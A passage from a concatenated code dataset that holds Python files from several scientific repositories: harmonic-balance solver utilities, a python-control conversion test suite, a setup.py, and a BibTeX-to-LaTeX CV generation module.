# Note that everything in params can be accessed within
# `function`.
accel_from_deriv[:, i] = params['function'](x[:, i], vel[:, i],
params)[:, 0]
e = (accel_from_deriv - accel) # /np.max(np.abs(accel))
states = accel
elif eqform == 'first_order':
vel_from_deriv = np.zeros_like(vel)
# Should subtract in place below to save memory for large problems
for i in np.arange(m):
# This should enable t to be used for current time in loops
# t = time_e[i]
params['cur_time'] = time_e[i]
# Note that everything in params can be accessed within
# `function`.
vel_from_deriv[:, i] =\
params['function'](x[:, i], params)[:, 0]
e = (vel_from_deriv - vel) # /np.max(np.abs(vel))
states = vel
else:
print('eqform cannot have a value of {}', eqform)
return 0, 0, 0, 0, 0
states_fft = fftp.rfft(states)
e_fft = fftp.rfft(e)
states_fft_condensed = condense_rfft(states_fft, num_harmonics)
e = condense_rfft(e_fft, num_harmonics)
if mask_constant is True:
e = e[:, 1:]
e = e / np.max(np.abs(states_fft_condensed))
return e
try:
X = globals()[method](hb_err, X0, **kwargs)
e = hb_err(X)
if mask_constant is True:
X = np.hstack((np.zeros_like(X[:, 0]).reshape(-1, 1), X))
amps = np.sqrt(X[:, 1]**2 + X[:, 2]**2) * 2 / X.shape[1]
phases = np.arctan2(X[:, 1], -X[:, 2])
except: # Catches and raises errors- needs actual error listed.
print(
'Excepted- search failed for omega = {:6.4f} rad/s.'.format(omega))
print("""What ever error this is, please put into har_bal
after the excepts (2 of them)""")
X = X0
print(mask_constant)
e = hb_err(X)
if mask_constant is True:
X = np.hstack((np.zeros_like(X[:, 0]).reshape(-1, 1), X))
amps = np.sqrt(X[:, 1]**2 + X[:, 2]**2) * 2 / X.shape[1]
phases = np.arctan2(X[:, 1], -X[:, 2])
raise
x = fftp.irfft(X)
if realify is True:
x = np.real(x)
else:
print('x was real')
return time, x, e, amps, phases
def hb_so(sdfunc, **kwargs):
"""Deprecated function name. Use hb_time."""
message = 'hb_so is deprecated. Please use hb_time or an alternative.'
warnings.warn(message, DeprecationWarning)
return hb_time(sdfunc, kwargs)
def harmonic_deriv(omega, r):
r"""Return derivative of a harmonic function using frequency methods.
Parameters
----------
omega: float
Fundamendal frequency, in rad/sec, of repeating signal
r: array_like
| Array of rows of time histories to take the derivative of.
| The 1 axis (each row) corresponds to a time history.
| The length of the time histories *must be an odd integer*.
Returns
-------
s: array_like
Function derivatives.
The 1 axis (each row) corresponds to a time history.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from mousai import *
>>> import scipy as sp
>>> from numpy import pi, sin, cos
>>> f = 2
>>> omega = 2.*pi * f
>>> numsteps = 11
>>> t = np.arange(0,1/omega*2*pi,1/omega*2*pi/numsteps)
>>> x = np.array([sin(omega*t)])
>>> v = np.array([omega*cos(omega*t)])
>>> states = np.append(x,v,axis = 0)
>>> state_derives = harmonic_deriv(omega,states)
>>> plt.plot(t,states.T,t,state_derives.T,'x')
[<matplotlib.line...]
"""
s = np.zeros_like(r)
for i in np.arange(r.shape[0]):
s[i, :] = fftp.diff(r[i, :]) * omega
return np.real(s)
def solmf(x, v, M, C, K, F):
r"""Return acceleration of second order linear matrix system.
Parameters
----------
x, v, F : array_like
:math:`n\times 1` arrays of current displacement, velocity, and Force.
M, C, K : array_like
Mass, damping, and stiffness matrices.
Returns
-------
a : array_like
:math:`n\\times 1` acceleration vector
Examples
--------
>>> import numpy as np
>>> M = np.array([[2,0],[0,1]])
>>> K = np.array([[2,-1],[-1,3]])
>>> C = 0.01 * M + 0.01 * K
>>> x = np.array([[1],[0]])
>>> v = np.array([[0],[10]])
>>> F = v * 0.1
>>> a = solmf(x, v, M, C, K, F)
>>> print(a)
[[-0.95]
[ 1.6 ]]
"""
return -la.solve(M, C @ v + K @ x - F)
def duff_osc(x, v, params):
"""Duffing oscillator acceleration."""
omega = params['omega']
t = params['cur_time']
acceleration = np.array([[-x - .1 * x**3. - 0.2 * v + np.sin(omega * t)]])
return acceleration
def time_history(t, x, num_time_points=200, realify=True):
r"""Generate refined time history from harmonic balance solution.
Harmonic balance solutions presume a limited number of harmonics in the
solution. The result is that the time history is usually a very limited
number of values. Plotting these results implies that the solution isn't
actually a continuous one. This function fills in the gaps using the
harmonics obtained in the solution.
Parameters
----------
t: array_like
1 x m array where m is the number of
values representing the repeating solution.
x: array_like
n x m array where m is the number of equations and m is the number of
values representing the repeating solution.
realify: boolean
Force the returned results to be real.
num_time_points: int
number of points desired in the "smooth" time history.
Returns
-------
t: array_like
1 x num_time_points array.
x: array_like
n x num_time_points array.
Examples
--------
>>> import numpy as np
>>> import mousai as ms
>>> x = np.array([[-0.34996499, 1.36053998, -1.11828552]])
>>> t = np.array([0. , 2.991993 , 5.98398601])
>>> t_full, x_full = ms.time_history(t, x, num_time_points=300)
Notes
-----
The implication of this function is that the higher harmonics that
were not determined in the solution are zero. This is indeed the assumption
made when setting up the harmonic balance solution. Whether this is a valid
assumption is something that the user must judge when obtaining the
solution.
"""
dt = t[1]
t_length = t.size
t = np.linspace(0, t_length * dt, num_time_points, endpoint=False)
x_freq = fftp.fft(x)
x_zeros = np.zeros((x.shape[0], t.size - x.shape[1]))
x_freq = np.insert(x_freq, [t_length - t_length // 2], x_zeros, axis=1)
x = fftp.ifft(x_freq) * num_time_points / t_length
if realify is True:
x = np.real(x)
else:
print('x was real')
return t, x
def condense_fft(X_full, num_harmonics):
"""Create equivalent amplitude reduced-size FFT from longer FFT."""
X_red = (np.hstack((X_full[:, 0:(num_harmonics + 1)],
X_full[:, -1:-(num_harmonics + 1):-1]))
* (2 * num_harmonics + 1) / X_full[0, :].size)
return X_red
def condense_rfft(X_full, num_harmonics):
"""Return real fft with fewer harmonics."""
X_len = X_full.shape[1]
X_red = X_full[:, :(num_harmonics) * 2 + 1] / \
X_len * (1 + 2 * num_harmonics)
return X_red
def expand_rfft(X, num_harmonics):
"""Return real fft with mor harmonics."""
X_len = X.shape[1]
cur_num_harmonics = (X_len - 1) / 2
X_expanded = np.hstack((X / X_len * (1 + 2 * num_harmonics),
np.zeros((X.shape[0],
int(2 * (num_harmonics
- cur_num_harmonics))))
))
return X_expanded
def rfft_to_fft(X_real):
"""Switch from SciPy real fft form to complex fft form."""
X = fftp.fft(fftp.irfft(X_real))
return X
def fft_to_rfft(X):
"""Switch from complex form fft form to SciPy rfft form."""
X_real = fftp.rfft(np.real(fftp.ifft(X)))
return X_real
def time_history_r(t, x, num_time_points=200, realify=True):
r"""Generate refined time history from harmonic balance solution.
Harmonic balance solutions presume a limited number of harmonics in the
solution. The result is that the time history is usually a very limited
number of values. Plotting these results implies that the solution isn't
actually a continuous one. This function fills in the gaps using the
harmonics obtained in the solution.
Parameters
----------
t: array_like
1 x m array where m is the number of
values representing the repeating solution.
x: array_like
n x m array where m is the number of equations and m is the number of
values representing the repeating solution.
realify: boolean
Force the returned results to be real.
num_time_points: int
number of points desired in the "smooth" time history.
Returns
-------
t: array_like
1 x num_time_points array.
x: array_like
n x num_time_points array.
Examples
--------
>>> import numpy as np
>>> import mousai as ms
>>> x = np.array([[-0.34996499, 1.36053998, -1.11828552]])
>>> t = np.array([0. , 2.991993 , 5.98398601])
>>> t_full, x_full = ms.time_history(t, x, num_time_points=300)
Notes
-----
The implication of this function is that the higher harmonics that
were not determined in the solution are zero. This is indeed the assumption
made when setting up the harmonic balance solution. Whether this is a valid
assumption is something that the user must judge when obtaining the
solution.
"""
dt = t[1]
t_length = t.size
t = np.linspace(0, t_length * dt, num_time_points, endpoint=False)
x_freq = fftp.fft(x)
x_zeros = np.zeros((x.shape[0], t.size - x.shape[1]))
x_freq = np.insert(x_freq, [t_length - t_length // 2], x_zeros, axis=1)
# print(x_freq)
# x_freq = np.hstack((x_freq, x_zeros))
# print(x_freq)
x = fftp.ifft(x_freq) * num_time_points / t_length
if realify is True:
x = np.real(x)
else:
print('x was real')
return t, x
def function_to_mousai(sdfunc):
"""Convert scipy.integrate functions to Mousai form.
The form of the function returning state derivatives is
`sdfunc(x, t, params)` where `x` are the current states as an `n` by `1`
array, `t` is a scalar, and `params` is a dictionary of parameters, one of
which must be `omega`. This is inconsistent with the SciPy numerical
integrators for good cause, but can make simultaneous usage diffucult.
This function returns a function compatible with Mousai by using the
inspect package to determine the form of the function being used and to
wrap it in Mousai form.
Parameters
----------
sdfunc : function
function in SciPy integrator form (`odeint`_ or `solve_ivp`_)
Returns
-------
new_function : function
function in Mousai form (accepting inputs like a standard Mousai
function)
Notes
-----
.. seealso::
* ``old_mousai_to_new_mousai``
* ``mousai_to_odeint``
* ``mousai_to_solve_ivp``
.. _`odeint` : https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.ode.html#scipy.integrate.ode
.. _`solve_ivp` : https://docs.scipy.org/doc/scipy/reference/generated/scipy.integrate.solve_ivp.html#scipy.integrate.solve_ivp
"""
sig = inspect.signature(sdfunc)
call_parameters = list(sig.parameters.keys())
if len(call_parameters) == 2:
if call_parameters[0] == 't' or call_parameters[0] == 'time':
# t and x must be swapped, params available in over-scope
def newfunction(x, t, params={}):
for k, v in params.items():
exec("%s = %s" % (k, v))
return sdfunc(t, x)
else: # params available in overscope
def newfunction(x, t, params={}):
for k, v in params.items():
exec("%s = %s" % (k, v))
return sdfunc(x, t)
else:
if call_parameters[0] == 't' or call_parameters[0] == 'time':
# t and x must be swapped, params available in over-scope
def newfunction(x, t, params={}):
other_params = [params[x] for x in call_parameters]
return sdfunc(t, x, *other_params)
else: # params available in overscope
def newfunction(x, t, params={}):
other_params = [params[x] for x in call_parameters]
return sdfunc(x, t, *other_params)
return newfunction
def old_mousai_to_new_mousai(function):
"""Return derivative function converted to new Mousai format.
The original format for the Mousai derivative function was
`sdfunc(x, params)`. This is inconsistent with the SciPy integration
functions. To act more as expected, the standard from 0.4.0 on will take
the form `sdfunc(x, t, params)`.
Parameters
----------
sdfunc : function
function in old Mousai form. `sdfunc(y, params)`
Returns
-------
new_sdfunc : function
function in new Mousai form. `sdfunc(y, t, params)`
Notes
-----
.. seealso::
* ``function_to_mousai``
* ``mousai_to_odeint``
* ``mousai_to_solve_ivp``
"""
def new_sdfunc(x, t, params):
params['cur_time'] = t
return function(x, params)
return new_sdfunc
def mousai_to_solve_ivp(sdfunc, params):
"""Return function callable from solve_ivp given Mousai sdfunc.
Parameters
----------
sdfunc : function
Mousai-style function returning state derivatives.
params : dictionary
dictionary of parameters used by `sdfunc`.
Returns
-------
solve_ivp_function : function
function ordered to work with `solve_ivp`_
Notes
-----
The ability to pass parameters was deprecated in the new SciPy integrators:
`https://stackoverflow.com/questions/48245765/pass-args-for-solve-ivp-new-scipy-ode-api`
`https://github.com/scipy/scipy/issues/8352`
.. seealso::
* ``function_to_mousai``
* ``old_mousai_to_new_mousai``
* ``mousai_to_odeint``
"""
sig = inspect.signature(sdfunc)
call_parameters = list(sig.parameters.keys())
if len(call_parameters) == 2:
sdfunc = old_mousai_to_new_mousai(sdfunc)
print("""Warning. The two-argument form of Mousai derivsative functions
is deprecated.""")
def solve_ivp_function(t, y):
return sdfunc(y, t, params)
return solve_ivp_function
def mousai_to_odeint(sdfunc, params):
"""Return function callable from solve_ivp given Mousai a sdfunc.
Parameters
----------
sdfunc : function
Mousai-style function returning state derivatives.
params : dictionary
dictionary of parameters used by `sdfunc`.
Returns
-------
odeint_function : function
function ordered to work with `odeint`_
Notes
-----
.. seealso::
* ``function_to_mousai``
* ``old_mousai_to_new_mousai``
* ``mousai_to_solve_ivp``
"""
sig = inspect.signature(sdfunc)
call_parameters = list(sig.parameters.keys())
if len(call_parameters) == 2:
sdfunc = old_mousai_to_new_mousai(sdfunc)
print("""Warning. The two-argument form of Mousai derivative โ โ \
functions is deprecated.""")
if 'sdfunc_params' not in globals():
print("Define your parameters in the user created `sdfunc_params`",
"dictionary.")
sdfunc_params = {}
def odeint_function(y, t):
return sdfunc(y, t, params=sdfunc_params)
return odeint_function
``` |
{
"source": "josephcslater/python-control",
"score": 3
} |
#### File: control/tests/convert_test.py
```python
from __future__ import print_function
from warnings import warn
import numpy as np
import pytest
from control import rss, ss, ss2tf, tf, tf2ss
from control.statesp import _mimo2siso
from control.statefbk import ctrb, obsv
from control.freqplot import bode
from control.exception import slycot_check
from control.tests.conftest import slycotonly
# Set to True to print systems to the output.
verbose = False
# Maximum number of states to test + 1
maxStates = 4
# Maximum number of inputs and outputs to test + 1
# If slycot is not installed, just check SISO
maxIO = 5 if slycot_check() else 2
@pytest.fixture
def fixedseed(scope='module'):
"""Get consistent results"""
np.random.seed(7)
class TestConvert:
"""Test state space and transfer function conversions."""
def printSys(self, sys, ind):
"""Print system to the standard output."""
print("sys%i:\n" % ind)
print(sys)
@pytest.mark.parametrize("states", range(1, maxStates))
@pytest.mark.parametrize("inputs", range(1, maxIO))
@pytest.mark.parametrize("outputs", range(1, maxIO))
def testConvert(self, fixedseed, states, inputs, outputs):
"""Test state space to transfer function conversion.
start with a random SS system and transform to TF then
back to SS, check that the matrices are the same.
"""
ssOriginal = rss(states, outputs, inputs)
if verbose:
self.printSys(ssOriginal, 1)
# Make sure the system is not degenerate
Cmat = ctrb(ssOriginal.A, ssOriginal.B)
if (np.linalg.matrix_rank(Cmat) != states):
pytest.skip("not reachable")
Omat = obsv(ssOriginal.A, ssOriginal.C)
if (np.linalg.matrix_rank(Omat) != states):
pytest.skip("not observable")
tfOriginal = tf(ssOriginal)
if (verbose):
self.printSys(tfOriginal, 2)
ssTransformed = ss(tfOriginal)
if (verbose):
self.printSys(ssTransformed, 3)
tfTransformed = tf(ssTransformed)
if (verbose):
self.printSys(tfTransformed, 4)
# Check to see if the state space systems have same dim
if (ssOriginal.nstates != ssTransformed.nstates) and verbose:
print("WARNING: state space dimension mismatch: %d versus %d" %
(ssOriginal.nstates, ssTransformed.nstates))
# Now make sure the frequency responses match
# Since bode() only handles SISO, go through each I/O pair
# For phase, take sine and cosine to avoid +/- 360 offset
for inputNum in range(inputs):
for outputNum in range(outputs):
if (verbose):
print("Checking input %d, output %d"
% (inputNum, outputNum))
ssorig_mag, ssorig_phase, ssorig_omega = \
bode(_mimo2siso(ssOriginal, inputNum, outputNum),
deg=False, plot=False)
ssorig_real = ssorig_mag * np.cos(ssorig_phase)
ssorig_imag = ssorig_mag * np.sin(ssorig_phase)
#
# Make sure TF has same frequency response
#
num = tfOriginal.num[outputNum][inputNum]
den = tfOriginal.den[outputNum][inputNum]
tforig = tf(num, den)
tforig_mag, tforig_phase, tforig_omega = \
bode(tforig, ssorig_omega,
deg=False, plot=False)
tforig_real = tforig_mag * np.cos(tforig_phase)
tforig_imag = tforig_mag * np.sin(tforig_phase)
np.testing.assert_array_almost_equal(
ssorig_real, tforig_real)
np.testing.assert_array_almost_equal(
ssorig_imag, tforig_imag)
#
# Make sure xform'd SS has same frequency response
#
ssxfrm_mag, ssxfrm_phase, ssxfrm_omega = \
bode(_mimo2siso(ssTransformed,
inputNum, outputNum),
ssorig_omega,
deg=False, plot=False)
ssxfrm_real = ssxfrm_mag * np.cos(ssxfrm_phase)
ssxfrm_imag = ssxfrm_mag * np.sin(ssxfrm_phase)
np.testing.assert_array_almost_equal(
ssorig_real, ssxfrm_real, decimal=5)
np.testing.assert_array_almost_equal(
ssorig_imag, ssxfrm_imag, decimal=5)
# Make sure xform'd TF has same frequency response
#
num = tfTransformed.num[outputNum][inputNum]
den = tfTransformed.den[outputNum][inputNum]
tfxfrm = tf(num, den)
tfxfrm_mag, tfxfrm_phase, tfxfrm_omega = \
bode(tfxfrm, ssorig_omega,
deg=False, plot=False)
tfxfrm_real = tfxfrm_mag * np.cos(tfxfrm_phase)
tfxfrm_imag = tfxfrm_mag * np.sin(tfxfrm_phase)
np.testing.assert_array_almost_equal(
ssorig_real, tfxfrm_real, decimal=5)
np.testing.assert_array_almost_equal(
ssorig_imag, tfxfrm_imag, decimal=5)
def testConvertMIMO(self):
"""Test state space to transfer function conversion.
Do a MIMO conversion and make sure that it is processed
correctly both with and without slycot
Example from issue gh-120, jgoppert
"""
# Set up a 1x3 transfer function (should always work)
tsys = tf([[[-235, 1.146e4],
[-235, 1.146E4],
[-235, 1.146E4, 0]]],
[[[1, 48.78, 0],
[1, 48.78, 0, 0],
[0.008, 1.39, 48.78]]])
# Convert to state space and look for an error
if (not slycot_check()):
with pytest.raises(TypeError):
tf2ss(tsys)
else:
ssys = tf2ss(tsys)
assert ssys.B.shape[1] == 3
assert ssys.C.shape[0] == 1
def testTf2ssStaticSiso(self):
"""Regression: tf2ss for SISO static gain"""
gsiso = tf2ss(tf(23, 46))
assert 0 == gsiso.nstates
assert 1 == gsiso.ninputs
assert 1 == gsiso.noutputs
# in all cases ratios are exactly representable, so assert_array_equal
# is fine
np.testing.assert_array_equal([[0.5]], gsiso.D)
def testTf2ssStaticMimo(self):
"""Regression: tf2ss for MIMO static gain"""
# 2x3 TFM
gmimo = tf2ss(tf(
[[ [23], [3], [5] ], [ [-1], [0.125], [101.3] ]],
[[ [46], [0.1], [80] ], [ [2], [-0.1], [1] ]]))
assert 0 == gmimo.nstates
assert 3 == gmimo.ninputs
assert 2 == gmimo.noutputs
d = np.array([[0.5, 30, 0.0625], [-0.5, -1.25, 101.3]])
np.testing.assert_array_equal(d, gmimo.D)
def testSs2tfStaticSiso(self):
"""Regression: ss2tf for SISO static gain"""
gsiso = ss2tf(ss([], [], [], 0.5))
np.testing.assert_array_equal([[[0.5]]], gsiso.num)
np.testing.assert_array_equal([[[1.]]], gsiso.den)
def testSs2tfStaticMimo(self):
"""Regression: ss2tf for MIMO static gain"""
# 2x3 TFM
a = []
b = []
c = []
d = np.array([[0.5, 30, 0.0625], [-0.5, -1.25, 101.3]])
gtf = ss2tf(ss(a, b, c, d))
# we need a 3x2x1 array to compare with gtf.num
numref = d[..., np.newaxis]
np.testing.assert_array_equal(numref,
np.array(gtf.num) / np.array(gtf.den))
@slycotonly
def testTf2SsDuplicatePoles(self):
"""Tests for 'too few poles for MIMO tf gh-111'"""
num = [[[1], [0]],
[[0], [1]]]
den = [[[1, 0], [1]],
[[1], [1, 0]]]
g = tf(num, den)
s = ss(g)
np.testing.assert_array_equal(g.pole(), s.pole())
@slycotonly
def test_tf2ss_robustness(self):
"""Unit test to make sure that tf2ss is working correctly. gh-240"""
num = [ [[0], [1]], [[1], [0]] ]
den1 = [ [[1], [1,1]], [[1,4], [1]] ]
sys1tf = tf(num, den1)
sys1ss = tf2ss(sys1tf)
# slight perturbation
den2 = [ [[1], [1e-10, 1, 1]], [[1,4], [1]] ]
sys2tf = tf(num, den2)
sys2ss = tf2ss(sys2tf)
# Make sure that the poles match for StateSpace and TransferFunction
np.testing.assert_array_almost_equal(np.sort(sys1tf.pole()),
np.sort(sys1ss.pole()))
np.testing.assert_array_almost_equal(np.sort(sys2tf.pole()),
np.sort(sys2ss.pole()))
def test_tf2ss_nonproper(self):
"""Unit tests for non-proper transfer functions"""
# Easy case: input 2 to output 1 is 's'
num = [ [[0], [1, 0]], [[1], [0]] ]
den1 = [ [[1], [1]], [[1,4], [1]] ]
with pytest.raises(ValueError):
tf2ss(tf(num, den1))
# Trickier case (make sure that leading zeros in den are handled)
num = [ [[0], [1, 0]], [[1], [0]] ]
den1 = [ [[1], [0, 1]], [[1,4], [1]] ]
with pytest.raises(ValueError):
tf2ss(tf(num, den1))
``` |
{
"source": "josephcslater/to_latex",
"score": 3
} |
#### File: josephcslater/to_latex/setup.py
```python
from setuptools import setup
import os
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
"""Read the readme.rst file."""
return open(os.path.join(os.path.dirname(__file__), fname)).read()
with open('array_to_latex/__init__.py', 'rb') as fid:
for line in fid:
line = line.decode('utf-8')
if line.startswith('__version__'):
version = line.strip().split()[-1][1:-1]
break
setup(name='array_to_latex',
# Note: Version must also be set in __init__.py
# Version must also be set in download_url.
version=version,
description='Return Numpy and Pandas arrays as formatted LaTeX arrays.',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/josephcslater/array_to_latex/',
# download_url='https://github.com/josephcslater
# /array_to_latex/archive/0.42.tar.gz',
packages=['array_to_latex'],
long_description=read('README.rst'),
keywords=['latex', 'array', 'format', 'numpy', 'scipy'],
install_requires=['numpy', 'pandas', 'clipboard'],
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering',
'Topic :: Text Processing :: Markup :: LaTeX',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Topic :: Utilities']
)
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
``` |
{
"source": "josephcslater/vitae",
"score": 3
} |
#### File: vitae/vitae/vitae.py
```python
import bibtexparser
import tempfile
from bibtexparser.bparser import BibTexParser
from bibtexparser.customization import homogenize_latex_encoding
import os
from pathlib import Path
def makemycv(filename='cv.bib',
silent=True,
bibtex_types=('inbook', 'article', 'periodical',
'techreport', 'inproceedings'),
writeout=True,
indent=' ',
author=None,
outpath=None,
entrytypes=None):
r"""Create sub-bib TeX files for including into CV.abs
Written files with be names `entrytype```.tex`` to the current directory
if `outpath` is not defined. The files `entrytype```.tex`` will overwrite
files with the same name **without warning**.
Parameters
----------
filename : string (optional: default cv.tex)
Name (including optional path) of bib file containing citation entries
bibtex_types : tuple of strings (optional)
List of bibtex bibtex_types to generate \bibentry .tex files for.
Files will be be named `entrytype```.tex``
writeout : boolean (optional: default True)
Write to files. If false, only write to screenself.
indent : string
string of spaces for prettying up the item lists
author : string
select authors whose entries should be included.
outpath : string
output path to write files to.
silent : boolean (optional: default True)
print results to screen
Returns
-------
results : strings
Content(s) of each .tex file generated- in case you want them.
unaccounted : array
Array of bib entries not used in creation of the output.
bibs : array
Full array created by bibtexparser.
https://nwalsh.com/tex/texhelp/bibtx-7.html
Examples
--------
Makes tex files for inclusion in cv.tex (articles.tex, etc.).
See readme.rts on github.com
>>> import vitae
>>> vitae.makemycv(filename='cv.bib')
Alternatively from a terminal prompt:
> python -c "import vitae; vitae.makemycv(filename='cv.bib')"
"""
if entrytypes is not None:
print('entrytypes will be deprecated in future releases.')
print('Please use bibtex_types')
bibtex_types = entrytypes
if os.path.isfile(filename) is False:
print('{} is not an actual bib file.'.format(filename))
return
if outpath is None:
outpath = ''
if not os.path.isdir(outpath) and outpath != '':
print(outpath, ' is not a valid directory.')
return
parser = BibTexParser()
parser.customization = homogenize_latex_encoding
parser.ignore_nonstandard_types = False
with open(filename) as bibtex_file:
bib_database = bibtexparser.load(bibtex_file, parser)
bibs = bib_database.entries
if author is not None:
bibs = by_author(author, bibs)
results = {}
for entrytype in bibtex_types:
entry = [[bib['year'], bib['ID'], bib['title']]
for bib in bibs if bib['ENTRYTYPE'] == entrytype]
entry_sorted = sorted(entry, key=lambda paper: paper[0], reverse=True)
if silent is False:
if entrytype[-1] == 's':
print('Number of {} is {}'.format(
entrytype, len(entry_sorted)))
else:
print('Number of {}s is {}'.format(
entrytype, len(entry_sorted)))
file_contents = '\\begin{enumerate}\n'
for entry in entry_sorted:
file_contents += indent + '\\item \\bibentry{' + entry[1] + '}\n'
file_contents += '\\end{enumerate}'
if writeout is True:
file = open(os.path.join(outpath, entrytype + '.tex'), 'w')
file.write(file_contents)
file.close()
else:
print(file_contents)
results[entrytype] = file_contents
unaccounted = [bib for bib in bibs if bib['ENTRYTYPE'] not in bibtex_types]
if silent is False:
print('Unaccounted for entries is {}:'.format(len(unaccounted)))
for bib in unaccounted:
print(bib['ID'],
'\n ', bib['year'],
'\n ', bib['ENTRYTYPE'],
'\n ', bib['title'])
return results, unaccounted, bibs
def by_author(authorname, bibs):
"""Return only bibs containing authorname."""
keepindex = []
i = 0
an = authorname.replace(" ", "")
authorname = authorname.replace(',', ', ')
authorname = authorname.replace(" ", " ")
authorshort = 'xxxxxxx'
if ',' in authorname and len(an) > (1+an.find(',')):
authorshort = (authorname[:authorname.find(',')]
+ ', '
+ an[an.find(',')+1])
print('number of bibs', len(bibs))
for bib in bibs:
if 'author' in bib:
bibauthor = bib['author']
bibauthor = bibauthor.replace(',', ', ')
bibauthor = bibauthor.replace(' ', ' ')
if authorname in bibauthor:
keepindex.append(i)
i += 1
elif authorshort in bibauthor:
print('Close name WARNING- is bib entry correct?')
print(bib['author'], ': ', bib['title'])
author_bibs = [bibs[i] for i in keepindex]
return author_bibs
def replace_enquote(string):
r"""Replace \enquote with proper quotes."""
front = string[:string.find(r'\enquote{')]
back = string[string.find(r'\enquote{'):].replace('}', "''", 1)
back = back.replace(r'\enquote{', '``')
return front + back
def read_bbl(bblfilename):
"""Read bbl file and return dictionary of formatted citations."""
if not is_tool('pdflatex') or not is_tool('bibtex'):
print("Both pdflatex and bibtex must exist on your command",
" line to use this function.")
return
isbibtext = 0
formattedbibs = {}
# print(bibtexparser)
bbl = open(bblfilename, "r")
for line in bbl:
if line[:6] == r'\begin' or line[:4] == r'\end':
pass
elif r'\providecommand' in line:
pass
elif r'bibitem' in line:
bibitem = line[line.find('{')+1: line.find('}')]
isbibtext = 1
bibtext = ''
elif isbibtext == 1:
if len(line) > 2:
bibtext += line.strip('\n')
elif len(line) < 2:
bibtext = replace_enquote(bibtext)
formattedbibs[bibitem] = bibtext
isbibtext = 0
return formattedbibs
def formatted_bibs(bibfile, bibliographystyle='plain'):
"""Make a dictionary of formatted bibs.
Parameters
----------
bibfile : string
full path and file name to the .bib file
bibliographystyle : string (optional)
bst (bib style file) to use. Default: 'plain'
Returns
-------
formattedbibs : dictionary of strings
dictionary of formatted citations with Cite keys as keys.
bibs : array
bibfile array from bibtexparser
"""
# path = os.path.dirname(bibfile)
# bibfilename = os.path.basename(bibfile)
bibliographystyle = bibliographystyle.replace('.bst', '')
old_directory = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdirname:
os.chdir(tmpdirname)
with open('cv_temp.tex', 'w') as template:
# template.write('hello')
template_head = (r"""% !TEX root = cv.tex
\documentclass[12pt, letter]{article}
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage{bibentry}
\newcommand{\enquote}[1]{``#1''}
\makeatletter\let\saved@bibitem\@bibitem\makeatother
\usepackage[colorlinks=true]{hyperref}
\makeatletter\let\@bibitem\saved@bibitem\makeatother
\usepackage{url}{}
\renewcommand{\cite}{\bibentry}
\begin{document}
\nobibliography{"""
+ bibfile
+ r"""}
\bibliographystyle{"""
+ bibliographystyle
+ r"""}
\pagestyle{plain}
\input{article.tex}
\input{inbook.tex}
\input{inproceedings}
\input{periodical}
\input{techreport}
\end{document}""")
template.write(template_head)
_, _, bibs = makemycv(filename=bibfile, silent=True)
os.system('lualatex -interaction="batchmode" cv_temp; bibtex cv_temp')
# print(os.path.join(tmpdirname, 'cv_temp.bbl'))
formattedbibs = read_bbl('cv_temp.bbl')
os.chdir(old_directory) # Unnecessary
return formattedbibs, bibs
def is_tool(name):
"""Check whether `name` is on PATH and marked as executable."""
from shutil import which
return which(name) is not None
def merge_formatted_into_db(formattedbibs, bibfilename=None, bibs=None):
"""Create bib database including formated bibs."""
print('formattedbibs length', len(formattedbibs))
if bibs is None:
if bibfilename is None:
print('No bib file name given.')
return
if os.path.isfile(bibfilename) is False or 'bib' not in bibfilename:
print('{} is not an actual bib file.')
return
parser = BibTexParser()
parser.customization = homogenize_latex_encoding
parser.ignore_nonstandard_types = False
with open(bibfilename) as bibtex_file:
bib_database = bibtexparser.load(bibtex_file, parser, encoding='utf-8')
bibs = bib_database.entries
bib_database = [[bib['year'],
bib['ID'],
bib['title'],
bib['ENTRYTYPE'],
formattedbibs[bib['ID']]]
for bib in bibs if bib['ID'] in formattedbibs.keys()]
print('bib_database formatted', len(bib_database))
return bib_database
def write_bibs(bibfile=None,
bibliographystyle='plain',
outfile_name=None,
since_year=None,
number_citations=None,
bibtex_types=('articles'),
authorname=None,
outputformat=None,
silent=False,
standalone=True,
overwrite=False):
"""Write formatted bibs from bibfile to desired format.
Parameters
----------
bibfile : string
full path and file name to the .bib file
bibliographystyle : string (optional)
bst (bib style file) to use. Default: 'plain'.
outfile_name : string (optional)
name of output file. Default bibfile name with .tex extension. Default
output format is html.
since_year : integer (optional)
year of oldest citation to include. Default: All years.
number_citations : integer (optional)
maximum number of citations to include. Default: all.
bibtex_types : tuple of strings (optional)
list of types of entries to include. Default: ('articles')
authorname : string (optional)
author whos papers to include. Default: all.
silent : Boolean (optional)
display diagnostics. Default: False (will display diagnostics)
standalone : Boolean (optional)
By default, pandoc generates only a fragment. If you want a full
document set this to False. Default: True
overwrite : Boolean (optional)
Overwrite results files? Default: False
Examples
--------
To write citations to an html file:
>>> import vitae
>>> vitae.write_bibs(bibfile = '/Users/jslater/Documents/Resumes/cv.bib',
bibliographystyle='plain',
outfile_name='try.html',
since_year=2008)
Alternatively, from a terminal prompt:
> python -c "import vitae; vitae.write_bibs(bibfile='cv.bib',
bibliographystyle='plain',
outfile_name = 'bibs.html',
since_year=2008)"
"""
if '.bib' in outfile_name:
print('I refuse to write over a bib file. '
+ 'While this software comes with no warrantee, '
+ "I'm also not going to knowlingly cause you damage. "
+ 'Please choose a more sensible output file name.')
return
if bibfile is None:
print('You must include the input named argument: bibfile')
print('This should include with full name with path.')
print('If the path is not included, cwd will be presumed.')
print('')
print('On Mac or Linux, this looks like:')
print('\'/Users/myusername/Documents/CVs/cv.bib\'')
print('')
print('On Windows, this looks like:')
print('r\'C:\\Users\\myusername\\Documents\\CVs\\cv.bib\'')
